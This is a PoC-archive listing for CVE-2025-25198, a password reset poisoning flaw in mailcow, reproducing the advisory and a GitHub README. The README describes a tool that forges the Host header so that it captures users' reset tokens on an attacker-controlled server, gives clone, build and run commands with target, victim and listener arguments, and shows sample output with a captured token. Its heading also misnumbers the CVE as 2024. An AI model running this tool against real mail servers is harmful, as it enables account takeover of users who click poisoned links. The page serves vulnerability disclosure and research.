Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-25198 PoC — mailcow: dockerized vulnerable to password reset poisoning

Source
https://github.com/enzocipher/CVE-2025-25198-PoC
Associated Vulnerability
Title:mailcow: dockerized vulnerable to password reset poisoning (CVE-2025-25198)
Description:mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the `Host HTTP` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link. Version 2025-01a contains a patch. As a workaround, deactivate the password reset functionality by clearing `Notification email sender` and `Notification email subject` under System -> Configuration -> Options -> Password Settings.
Description
Captures password reset tokens from Mailcow Host header injection attacks.
Readme
# CVE-2024-25198

mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the `Host HTTP` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link. 

## How works?
Sets up an https server to hear al requests and sends a POST Request to the website with the Host header with your selected <IP>. You can also use Burpsuite to send the request and get the Token in the server.

## Features

- HTTPS server that retrieves the Password Change Token
- Exploit script that attacks the website vulnerability.
- Fixed Everything and no longer requires openssl to work 

## Prerequisites

- Go 1.16 or higher

## Server Script

```bash
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
```

## Exploit Script
```bash
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <user@email.com> --host <ip>:<port>  <--insecure | optional >
```

After waiting a bit the server will output the token that you can use :
```
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →